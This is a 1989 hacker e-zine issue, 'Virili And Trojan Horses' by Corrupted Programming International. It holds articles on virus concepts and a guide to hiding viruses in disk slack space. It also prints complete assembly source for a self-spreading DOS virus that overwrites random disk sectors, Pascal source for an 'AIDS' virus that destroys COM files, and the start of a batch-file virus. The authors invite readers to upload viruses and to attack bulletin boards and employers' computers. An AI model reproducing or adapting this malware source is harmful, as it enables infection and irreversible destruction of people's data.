|
Computer viruses - a protagonist's point of view #
NOTICE: TO ALL CONCERNED Certain text files and messages contained on this site deal with activities and devices which would be in violation of various Federal, State, and local laws if actually carried out or constructed. The webmasters of this site do not advocate the breaking of any law. Our text files and message bases are for informational purposes only. We recommend that you contact your local law enforcement officials before undertaking any project based upon any information obtained from this or any other web site. We do not guarantee that any of the information contained on this system is correct, workable, or factual. We are not responsible for, nor do we assume any liability for, damages resulting from the use of any information on this site.
[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* *
* @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ *
* @@@@ @@@@ @@@@ @@@@ @@@ *
* @@@ @@@ @@@@ @@@ *
* @@@ @@@@@@@@@@@@@@@ @@@ *
* @@@ @@@@@@@@@@@@@@ @@@ *
* @@@ @@@ @@@ *
* @@@@ @@@@ @@@ @@@ *
* @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ *
* *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
C O R R U P T E D
P R O G R A M M I N G
I N T E R N A T I O N A L
presents:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ @
@ Virili And Trojan Horses @
@ @
@ A Protagonist's Point Of View @
@ @
@ Issue #2 @
@ @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
DISCLAIMER::All of the information contained in this newsletter reflects the
thoughts and ideas of the authors, not their actions. The sole
purpose of this document is to educate and spread information.
Any illegal or illicit action is not endorsed by the authors or
CPI. The authors and CPI are not responsible for any information
which may present itself as old or mis-interpreted, and actions
by the reader. Remember, 'Just Say No!'
CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Introduction To CPI#2
---------------------
Well, here is the "long awaited" second issue of CPI, A Protagonist's Point
of view. This issue should prove a bit interesting, I dunno, but at least
entertaining for the time it takes to read. Enjoy the information and don't
forget the disclaimer.
Oh yes, if you have some interesting articles or an application to send
us, just see the BBS list at the end of this document. Thanx. All applications
and information will be voted on through the CPI Inner Circle. Hope you enjoy
this issue as much as we enjoyed typing it... hehe...
Until our next issue, (which may be whenever), good-bye.
Doctor Dissector
Table of Contents
-----------------
Part Title Author
-----------------------------------------------------------------------------
2.1 Title Page, Introduction, & TOC....................... Doctor Dissector
2.2 Another Explanation Of Virili And Trojans............. Acid Phreak
2.3 V-IDEA-1.............................................. Ashton Darkside
2.4 V-IDEA-2.............................................. Ashton Darkside
2.5 The Generic Virus..................................... Doctor Dissector
2.6 Aids.................................................. Doctor Dissector
2.7 Batch File Virus...................................... PHUN 3.2
2.8 Basic Virus........................................... PHUN 3.2
2.9 The Alemeda Virus..................................... PHUN 4.3
2.10 Virili In The News.................................... Various Sources
2.11 Application For CPI................................... CPI Inner Circle
(CPI Node Phone #'s Are In 2.11)
[2.2]
Explanation of Viruses and Trojans Horses
-----------------------------------------
Written by Acid Phreak
Like it's biological counterpart, a computer virus is an agent of
infection, insinuating itself into a program or disk and forcing its host
to replicate the virus code. Hackers fascinated by the concept of "living"
code wrote the first viruses as projects or as pranks. In the past few
years, however, a different kind of virus has become common, one that lives
up to an earlier meaning of the word: in Latin, virus means poison.
These new viruses incorporate features of another type of insidious
program called a Trojan horse. Such a program masquerades as a useful
utility or product but wreaks havoc on your system when you run it. It may
erase a few files, format your disk, steal secrets--anything software can
do, a Trojan horse can do. A malicious virus can do all this then attempt
to replicate itself and infect other systems.
The growing media coverage of the virus conceptand of specific viruse
has promoted the development of a new type of software. Antivirus programs,
vaccines--they go by many names, but their purpose is to protect from virus
attack. At present there are more antivirus programs than known viruses
(not for long).
Some experts quibble about exactly what a virus is. The most widely
known viruses, the IBM Xmas virus and the recent Internet virus, are not
viruses according to some experts because they do not infect other programs.
Others argue that every Trojan horse is a virus--one that depends completely
on people to spread it.
How They Reproduce:
-------------------
Viruses can't travel without people. Your PC will not become infected
unless someone runs an infected program on it, whether accidentally or on
purpose. PC's are different from mainframe networks in this way--the
mainframe Internet virus spread by transmitting itself to other systems and
ordering them to execute it as a program. That kind of active transmission
is not possible on a PC.
Virus code reproduces by changing something in your system. Some viruses
strike COMMAND.COM or the hidden system files. Others, like the notorious
Pakistani-Brain virus, modify the boot sector of floppy disks. Still others
attach themselves to any .COM or .EXE file. In truth, any file on your
system that can be executed--whether it's a program, a device driver, an
overlay, or even a batch file--could be the target of a virus.
When an infected program runs, the virus code usually executes first and
then transfers control to the original program. The virus may immediately
infect other programs, or it may load itself into RAM and continue spreading.
If the virus can infect a file that will be used on another system, it has
succeeded.
What They Can Do:
-----------------
Viruses go through two phases: a replication phase and an action phase.
The action doesn't happen until a certain even occurs--perhaps reaching a
special date or running the virus a certain number of times. It wouldn't
make sense for a virus to damage your system the first time it ran; it needs
some time to grow and spread first.
The most vulnerable spot for a virus attack is your hard disk's file
allocation table (FAT). This table tells DOS where every file's data resides
on the disk. Without the FAT, the data's still there but DOS can't find it.
A virus could also preform a low-level format on some or all the tracks of
your hard disk, erase all files, or change the CMOS memory on AT-class
computers so that they don't recognize the hard disk.
Most of the dangers involve data only, but it's even possible to burn
out a monochrome monitor with the right code.
Some virus assaults are quite subtl. One known virus finds four
consecutive digits on the screen and switches two. Let's hope you're not
balancing the company's books when this one hits. Others slow down system
operations or introduce serious errors.
[2.3]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
"Ok, I've written the virus, now where the hell do I put it?"
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
Ok, wow! You've just invented the most incredibly nifty virus. It
slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data!
But the only problem is, if you go around infecting every damn file, some cute
software company is going to start putting in procedures that checksum their
warez each time they run, which will make life for your infecting virus a total
bitch. Or somebody's going to come up with an incredibly nifty vaccination util
that will wipe it out. Because, i mean, hey, when disk space starts vanishing
suddenly in 500K chunks people tend to notice. Especially people like me that
rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying
"wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need
to go around wasting your precious time when the answer is right there in front
of you! Think about it, you could be putting that time into writing better and
more inovative viruses, or you could be worring about keeping the file size,
the date & time, and the attributes the same. With this system, you only need
to infect one file, preferably one that's NOT a system file, but something that
will get run alot, and will be able to load your nifty virus on a daily basis.
This system also doesn't take up any disk space, other than the loader. And the
loader could conceivably be under 16 bytes (damn near undetectable). First of
all, you need to know what programs to infect. Now, everybody knows about using
COMMAND.COM and that's unoriginal anyway, when there are other programs people
run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or
WordPerfect; you get the idea. Better still are dos commands like Format, Link
or even compression utilities. But you get the point. Besides, who's going to
miss 16 bytes, right? Now, the good part: where to put the damn thing. One note
to the programmer: This could get tricky if your virus is over 2k or isn't
written in Assembly, but the size problem is easy enough, it would be a simple
thing to break your virus into parts and have the parts load each other into
the system so that you do eventually get the whole thing. The only problem with
using languages besides assembly is that it's hard to break them up into 2k
segments. If you want to infect floppys, or smaller disks, you'd be best off to
break your file into 512 byte segments, since they're easier to hide. But, hey,
in assembly, you can generate pretty small programs that do alot, tho. Ok, by
now you've probably figured out that we're talking about the part of the disk
called 'the slack'. Every disk that your computer uses is divided up into parts
called sectors, which are (in almost all cases) 512 bytes. But in larger disks,
and even in floppies, keeping track of every single sector would be a complete
bitch. So the sectors are bunched together into groups called 'clusters'. On
floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard
disks, they're typically 4096 bytes, or eight sectors. Now think about it, you
have programs on your hard disk, and what are the odds that they will have
sizes that always end up in increments of 4096? If I've lost you, think of it
this way: the file takes up a bunch of clusters, but in the last cluster it
uses, there is usually some 'slack', or space that isn't used by the file. This
space is between where the actual file ends and where the actual cluster ends.
So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard
disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton
program 'FS /S /T' command from your root directory, and subtract the total
size of the files from the total disk space used. That's how much 'slack' space
is on your disk (a hell of alot, even on a floppy). To use the slack, all you
need to do is to find a chunk of slack big enough to fit your virus (or a
segment of your virus) and use direct disk access (INT 13) to put your virus
there. There is one minor problem with this. Any disk write to that cluster
will overwrite the slack with 'garbage' from memory. This is because of the way
DOS manages it's disk I/O and it can't be fixed without alot of hassles. But,
there is a way around even this. And it involves a popular (abeit outdated and
usually ineffectual) form of virus protection called the READ-ONLY flag. This
flag is the greatest friend of this type of virus. Because if the file is not
written to, the last cluster is not written to, and voila! Your virus is safe
from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk
I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set
because that has the same Read-only effect (even tho I haven't seen it written,
it's true that if the file is designated system, DOS treats it as read-only,
whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM
in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too
lazy to find out myself) or a protected (!) COMMAND.COM file in either type of
DOS would be ideal for this. All you have to do is then insert your loader into
some innocent-looking file, and you are in business. All your loader has to do
is read the sector into the highest part of memory, and do a far call to it.
Your virus cann then go about waiting for floppy disks to infect, and place
loaders on any available executable file on the disk. Sound pretty neet? It is!
Anyway, have fun, and be sure to upload your virus, along with a README file on
how it works to CPI Headquarters so we can check it out! And remember: don't
target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if
the Sysop is a leech and you want to shove his balls down his throat. Because
if all the PHP boards go down (especially members of CPI), who the hell can you
go to for all these nifty virus ideas? And besides, it's betraying your own
people, which is uncool even if you are an anarchist. So, target uncool PD
boards, or your boss's computer or whatever, but don't attack your friends.
Other than that, have phun, and phuck it up!
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applicaitons Network (SATAN)
Corrupted Programmers International (CPI)
PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk).
Call these boards because the sysops are cool:
Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader)
System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader)
The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader)
D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader)
The Jolly Bardsmen's Pub & Tavern
The Sierra Crib
The Phrozen Phorest
Knight Shadow's Grotto
And if I forgot your board, sorry, but don't send me E-mail bitching about it!
[2.4]
-------------------------------------------------------------------------------
______ ________ ___________
/ ____ \ | ____ \ |____ ____|
| / \_| | | \ | | |
| | | |_____| | | |
| | | ______/ | |
| | _ | | | |
| \____/ | /\ | | /\ ____| |____ /\
\______/ \/ |_| \/ |___________| \/
"We ain't the phucking Salvation Army."
-------------------------------------------------------------------------------
C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L
* * * present * * *
CPI Virus Standards - Protect yourself and your friends
By Ashton Darkside (DUNE / SATAN / CPI)
*******************************************************************************
DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES
ONLY! The author does NOT condone the use of this information in any manner
that would be illegal or harmful. The fact that the author knows and spreads
this information in no way suggests that he uses it. The author also accepts
no responsibility for the malicious use of this information by anyone who
reads it! Remember, we may talk alot, but we "just say no" to doing it.
*******************************************************************************
One of the main problems with viruses is that once you set one loose,
it is no longer under your control. I propose to stop this by introducing some
standards of virus writing that will enable them to be deactivated whenever
they enter a 'friendly' (CPI) system. In the long run, even the author of the
virus is not immune to being attacked. The following are what I have termed the
CPI standards for writing viruses. They will allow a virus to easily check any
system they are being run on for a type of 'identity badge'. If it is found,
the virus will not infect the system it is being run on. The other standards
are mostly written around this.
CPI Standards for writing viruses -
1 - The virus will have an 'active period' and an 'inactive period'.
The active periods will be no more than one year in length (to make
it more difficult to discover the virus). You may release different
versions of your virus with different 'active periods'. It is not
recommended that your virus deactivate itself after the set active
period, as this would enable people to deactivate viruses by using
their computer with the date set to 2069 or something. It is also
required that activation periods begin on January 1 and end on
December 31. This will coincide with the changing identity codes.
2 - The virus will check for an identity code by executing Interrrupt
12h with the following register settings: AX - 4350, BX - 4920,
CX - AB46, DX - 554E. If the system is friendly, then a pointer
will be returned in CX:DX to an ASCIIZ (0-terminated) string which
will have different contents in different years. The codes are not
to be included in any text file, and should only be given through
E-mail on CPI affiliated systems. You can always ask me by sending
me mail at The Andromeda Strain BBS. If a system is detected as
friendly, the virus will not attempt to infect or damage it, but it
is ok to display a little greeting message about how lucky the
user was.
3 - We very much encourage you to upload your virus, along with a breif
description on the workings into the CPI section at The Andromeda
Strain BBS. Only CPI members will know about your virus. This is
so that CPI members can share techniques and it also allows us to
verify that the identity check works. If we see any improvements
that could be made, such as ways to streamline code, better ways of
spreading, etc. we will inform you so that you can make the changes
if you wish.
4 - It is also suggested that you use ADS standard for virus storage on
infected disks. This meathod uses disk slack space for storage and
is more thoroughly described in a previous text file by me. I think
that this is the most effective and invisible way to store viruli.
5 - A list of CPI-Standard viruli will be avaliable at all times from
The Andromeda Strain BBS, to CPI users. Identity strings will also
be available to anyone in CPI, or anyone who uploads source code to
a virus which is 100% complete except for the Identity string (it
must be written to CPI-Standards). Non-CPI members who do this will
be more seriously considered for membership in CPI.
Ashton Darkside
Dallas Underground Network Exchange (DUNE)
Software And Telecom Applications Network (SATAN)
Corrupted Programmers International (CPI)
PS: This file (by itself) has approx 2.5k of slack.
;[2.5]
;=============================================================================
;
; C*P*I
;
; CORRUPTED PROGRAMMING INTERNATIONAL
; -----------------------------------
; p r e s e n t s
;
; T H E
; _ _
; (g) GENERIC VIRUS (g)
; ^ ^
;
;
; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF
; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT
; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO
; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS.
;
; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON
; THE DISK. HAVE PHUN WITH THIS ONE.
;
; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE
; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING.
;
; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE
; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF
; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR
; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE.
;
; DOCTOR DISSECTOR
; CPI INNER CIRCLE
;
;=============================================================================
MAIN:
NOP ;| Marker bytes that identify this program
NOP ;| as infected/a virus
NOP ;|
MOV AX,00 ;| Initialize the pointers
MOV ES:[POINTER],AX ;|
MOV ES:[COUNTER],AX ;|
MOV ES:[DISKS B],AL ;|
MOV AH,19 ;| Get the selected drive (dir?)
INT 21 ;|
MOV CS:DRIVE,AL ;| Get current path (save drive)
MOV AH,47 ;| (dir?)
MOV DH,0 ;|
ADD AL,1 ;|
MOV DL,AL ;| (in actual drive)
LEA SI,CS:OLD_PATH ;|
INT 21 ;|
MOV AH,0E ;| Find # of drives
MOV DL,0 ;|
INT 21 ;|
CMP AL,01 ;| (Check if only one drive)
JNZ HUPS3 ;| (If not one drive, go the HUPS3)
MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive)
HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive
LEA BX,SEARCH_ORDER ;|
ADD BX,AX ;|
ADD BX,0001 ;|
MOV CS:POINTER,BX ;|
CLC ;|
CHANGE_DISK: ;| Carry is set if no more .COM files are
JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be
MOV AH,17 ;| renamed to .COM (change .EXE to .COM)
LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program
INT 21 ;| to large to fit in memory" when starting
CMP AL,0FF ;| larger infected programs
JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found)
MOV AH,2CH ;| If neither .COM or .EXE files can be found,
INT 21 ;| then random sectors on the disk will be
MOV BX,CS:POINTER ;| overwritten depending on the system time
MOV AL,CS:[BX] ;| in milliseconds. This is the time of the
MOV BX,DX ;| complete "infection" of a storage medium.
MOV CX,2 ;| The virus can find nothing more to infect
MOV DH,0 ;| starts its destruction.
INT 26 ;| (write crap on disk)
NO_NAME_CHANGE: ;| Check if the end of the search order table
MOV BX,CS:POINTER ;| has been reached. If so, end.
DEC BX ;|
MOV CS:POINTER,BX ;|
MOV DL,CS:[BX] ;|
CMP DL,0FF ;|
JNZ HUPS2 ;|
JMP HOPS ;|
HUPS2: ;| Get a new drive from the search order table
MOV AH,0E ;| and select it, beginning with the ROOT dir.
INT 21 ;| (change drive)
MOV AH,3B ;| (change path)
LEA DX,PATH ;|
INT 21 ;|
JMP FIND_FIRST_FILE ;|
FIND_FIRST_SUBDIR: ;| Starting from the root, search for the
MOV AH,17 ;| first subdir. First, (change .exe to .com)
LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the
INT 21 ;| old directory.
MOV AH,3B ;| (use root directory)
LEA DX,PATH ;|
INT 21 ;|
MOV AH,04E ;| (search for first subdirectory)
MOV CX,00010001B ;| (dir mask)
LEA DX,MASKE_DIR ;|
INT 21 ;|
JC CHANGE_DISK ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
DEC BX ;|
JZ USE_NEXT_SUBDIR ;|
FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more
MOV AH,4FH ;| are found, the (search for next subdir)
INT 21 ;| drive will be changed.
JC CHANGE_DISK ;|
DEC BX ;|
JNZ FIND_NEXT_SUBDIR ;|
USE_NEXT_SUBDIR:
MOV AH,2FH ;| Select found directory. (get dta address)
INT 21 ;|
ADD BX,1CH ;|
MOV ES:[BX],W"\" ;| (address of name in dta)
INC BX ;|
PUSH DS ;|
MOV AX,ES ;|
MOV DS,AX ;|
MOV DX,BX ;|
MOV AH,3B ;| (change path)
INT 21 ;|
POP DS ;|
MOV BX,CS:COUNTER ;|
INC BX ;|
MOV CS:COUNTER,BX ;|
FIND_FIRST_FILE: ;| Find first .COM file in the current dir.
MOV AH,04E ;| If there are none, (Search for first)
MOV CX,00000001B ;| search the next directory. (mask)
LEA DX,MASKE_COM ;|
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
JMP CHECK_IF_ILL ;|
FIND_NEXT_FILE: ;| If program is ill (infected) then search
MOV AH,4FH ;| for another. (search for next)
INT 21 ;|
JC FIND_FIRST_SUBDIR ;|
CHECK_IF_ILL: ;| Check if already infected by virus.
MOV AH,3D ;| (open channel)
MOV AL,02 ;| (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| (save channel)
MOV AH,3FH ;| (read file)
MOV CH,BUFLEN ;|
MOV DX,BUFFER ;| (write in buffer)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV BX,CS:[BUFFER] ;| (look for three NOP's)
CMP BX,9090 ;|
JZ FIND_NEXT_FILE ;|
MOV AH,43 ;| This section by-passes (write enable)
MOV AL,0 ;| the MS/PC DOS Write Protection.
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV AH,43 ;|
MOV AL,01 ;|
AND CX,11111110B ;|
INT 21 ;|
MOV AH,3D ;| Open file for read/write (open channel)
MOV AL,02 ;| access (read/write)
MOV DX,9EH ;| (address of name in dta)
INT 21 ;|
MOV BX,AX ;| Read date entry of program and (channel)
MOV AH,57 ;| save for future use. (get date)
MOV AL,0 ;|
INT 21 ;|
PUSH CX ;| (save date)
PUSH DX ;|
MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp)
MOV CS:[JMPBUF],DX ;| the program will be saved for future use.
MOV DX,CS:[BUFFER+1] ;| (save new jump)
LEA CX,CONT-100 ;|
SUB DX,CX ;|
MOV CS:[CONTA],DX ;|
MOV AH,57 ;| The virus now copies itself to (write date)
MOV AL,1 ;| to the start of the file.
POP DX ;|
POP CX ;| (restore date)
INT 21 ;|
MOV AH,3EH ;| (close file)
INT 21 ;|
MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus
MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the
;| start of the program. This is done to
HOPS: ;| preserve the executability of the host
NOP ;| program as much as possible. After saving,
CALL USE_OLD ;| it still works with the jump address in the
;| virus. The jump address in the virus differs
;| from the jump address in memory
CONT DB 0E9 ;| Continue with the host program (make jump)
CONTA DW 0 ;|
MOV AH,00 ;|
INT 21 ;|
USE_OLD:
MOV AH,0E ;| Reactivate the selected (use old drive)
MOV DL,CS:DRIVE ;| drive at the start of the program, and
INT 21 ;| reactivate the selected path at the start
MOV AH,3B ;| of the program.(use old drive)
LEA DX,OLD_PATH-1 ;| (get old path and backslash)
INT 21 ;|
RET ;|
SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF
POINTER DW 0000 ;| (pointer f. search order)
COUNTER DW 0000 ;| (counter f. nth. search)
DISKS DB 0 ;| (number of disks)
MASKE_COM DB "*.COM",00 ;| (search for com files)
MASKE_DIR DB "*",00 ;| (search for dir's)
MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB
DB 0,"????????EXE",0,0,0,0
DB 0,"????????COM",0
MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB
DB 0,"???????????",0,0,0,0
DB 0,"????????COM",0
BUFFER EQU 0E00 ;| (a safe place)
BUFLEN EQU 208H ;| Length of virus. Modify this accordingly
;| if you modify this source. Be careful
;| for this may change!
JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp)
PATH DB "\",0 ;| (first place)
DRIVE DB 0 ;| (actual drive)
BACK_SLASH DB "\"
OLD_PATH DB 32 DUP (?) ;| (old path)
[2.6]
+-------------------------------+ +--------------------------------------+
| | P | |
| @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### |
| @@ @@ @@ @@ | R | # # # # # # |
| @@ @@ @@ @@ | * | ##### # # # ##### |
| @@ @@@@@@@@ @@ | E | # # # # # # |
| @@ @@ @@ | * | # # ##### #### ##### |
| @@ @@ @@ | S | |
| @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+
| | E | A NEW AND IMPROVED VIRUS FOR |
+-------------------------------+ * | PC/MS DOS MACHINES |
| C O R R U P T E D | N +--------------------------------------+
| | * | CREATED BY: DOCTOR DISSECTOR |
| P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY|
| | * | AUTHOR NOT RESPONSIBLE FOR READERS |
| I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS|
+-------------------------------+ +--------------------------------------+
Well well, here it is... I call it AIDS... It infects all COM files, but it is
not perfect, so it will also change the date/time stamp to the current system.
Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them!
Anyway, this virus was originally named NUMBER ONE, and I modified the code so
that it would fit my needs. The source code, which is included with this neato
package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works.
Well, I added a few things, you can experiment or mess around with it if you'd
like to, and add any mods to it that you want, but change the name and give us
some credit if you do.
The file is approximately 13k long, and this extra memory will be added to the
file it picks as host. If no more COM files are to be found, it picks a random
value from 1-10, and if it happens to be the lucky number 7, AIDS will present
a nice screen with lots of smiles, with a note telling the operator that their
system is now screwed, I mean permanantly. The files encrypted containing AIDS
in their code are IRREVERSIBLY messed up. Oh well...
Again, neither CPI nor the author of Number One or AIDS endorses this document
and program for use in any illegal manner. Also, CPI, the author to Number One
and AIDS is not responsible for any actions by the readers that may prove harm
in any way or another. This package was written for EDUCATIONAL purposes only!
{ Beginning of source code, Turbo Pascal 3.01a }
{C-}
{U-}
{I-} { Wont allow a user break, enable IO check }
{ -- Constants --------------------------------------- }
Const
VirusSize = 13847; { AIDS's code size }
Warning :String[42] { Warning message }
= 'This File Has Been Infected By AIDS! HaHa!';
{ -- Type declarations------------------------------------- }
Type
DTARec =Record { Data area for file search }
DOSnext :Array[1..21] of Byte;
Attr : Byte;
Ftime,
FDate,
FLsize,
FHsize : Integer;
FullName: Array[1..13] of Char;
End;
Registers = Record {Register set used for file search }
Case Byte of
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
End;
{ -- Variables--------------------------------------------- }
Var
{ Memory offset program code }
ProgramStart : Byte absolute Cseg:$100;
{ Infected marker }
MarkInfected : String[42] absolute Cseg:$180;
Reg : Registers; { Register set }
DTA : DTARec; { Data area }
Buffer : Array[Byte] of Byte; { Data buffer }
TestID : String[42]; { To recognize infected files }
UsePath : String[66]; { Path to search files }
{ Lenght of search path }
UsePathLenght: Byte absolute UsePath;
Go : File; { File to infect }
B : Byte; { Used }
LoopVar : Integer; {Will loop forever}
{ -- Program code------------------------------------------ }
Begin
GetDir(0, UsePath); { get current directory }
if Pos('\', UsePath) <> UsePathLenght then
UsePath := UsePath + '\';
UsePath := UsePath + '*.COM'; { Define search mask }
Reg.AH := $1A; { Set data area }
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
Reg.AH := $4E;
Reg.DS := Seg(UsePath);
Reg.DX := Ofs(UsePath[1]);
Reg.CX := $ff; { Set attribute to find ALL files }
MsDos(Reg); { Find first matching entry }
IF not Odd(Reg.Flags) Then { If a file found then }
Repeat
UsePath := DTA.FullName;
B := Pos(#0, UsePath);
If B > 0 then
Delete(UsePath, B, 255); { Remove garbage }
Assign(Go, UsePath);
Reset(Go);
If IOresult = 0 Then { If not IO error then }
Begin
BlockRead(Go, Buffer, 2);
Move(Buffer[$80], TestID, 43);
{ Test if file already ill(Infected) }
If TestID <> Warning Then { If not then ... }
Begin
Seek (Go, 0);
{ Mark file as infected and .. }
MarkInfected := Warning;
{ Infect it }
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
Close(Go);
Halt; {.. and halt the program }
End;
Close(Go);
End;
{ The file has already been infected, search next. }
Reg.AH := $4F;
Reg.DS := Seg(DTA);
Reg.DX := Ofs(DTA);
MsDos(Reg);
{ ......................Until no more files are found }
Until Odd(Reg.Flags);
Loopvar:=Random(10);
If Loopvar=7 then
begin
Writeln(' '); {Give a lot of smiles}
Writeln(' ');
Writeln(' ');
Writeln(' ATTENTION: ');
Writeln(' I have been elected to inform you that throughout your process of ');
Writeln(' collecting and executing files, you have accidentally �H??K?� ');
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
Writeln(' be; YES, it CAN be, a ????s has infected your system. Now what do ');
Writeln(' you have to say about that? HAHAHAHA. Have �H?? with this one and ');
Writeln(' remember, there is NO cure for ');
Writeln(' ');
Writeln(' ?????????? ???????????? ??????????? ?????????? ');
Writeln(' ???????????? ???????????? ???????????? ???????????? ');
Writeln(' ???? ??? ??? ??? ??? ???? ?? ');
Writeln(' ??? ??? ??? ??? ??? ??? ');
Writeln(' ????????????? ??? ??? ??? ???????????? ');
Writeln(' ????????????? ??? ??? ??? ???????????? ');
Writeln(' ??? ??? ??? ??? ??? ??? ');
Writeln(' ??? ??? ??? ??? ???? ?? ???? ');
Writeln(' ??? ??? ???????????? ????????????? ???????????? ');
Writeln(' ?? ?? ???????????? ??????????? ?????????? ');
Writeln(' ');
Writeln(' ');
REPEAT
LOOPVAR:=0;
UNTIL LOOPVAR=1;
end;
End.
{ Although this is a primitive virus its effective. }
{ In this virus only the .COM }
{ files are infected. Its about 13K and it will }
{ change the date entry. }
[2.7]
Batch Viruses
-------------
Whoever thought that viruses could be in BATCH file.This virus which we
are about to see makes use of MS-DOS operating system. This BATCH virus
uses DEBUG & EDLIN programs.
Name: VR.BAT
echo = off ( Self explanatory)
ctty nul ( This is important. Console output is turned off)
path c:\msdos ( May differ on other systems )
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
debug ind<2 ( New batch program is created with debug)
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
ctty con ( Console interface is again assigned)
name ( Newly created NAME.BAT is called.
In addition to file to this Batch file,there command files,here named 1,2,3
Here is the first command file:
-------------------------------
Name: 1
1,4d ( Here line 1-4 of the "IND" file are deleted )
e ( Save file )
Here is the second command file:
--------------------------------
Name: 2
m100,10b,f000 (First program name is moved to the F000H address to save)
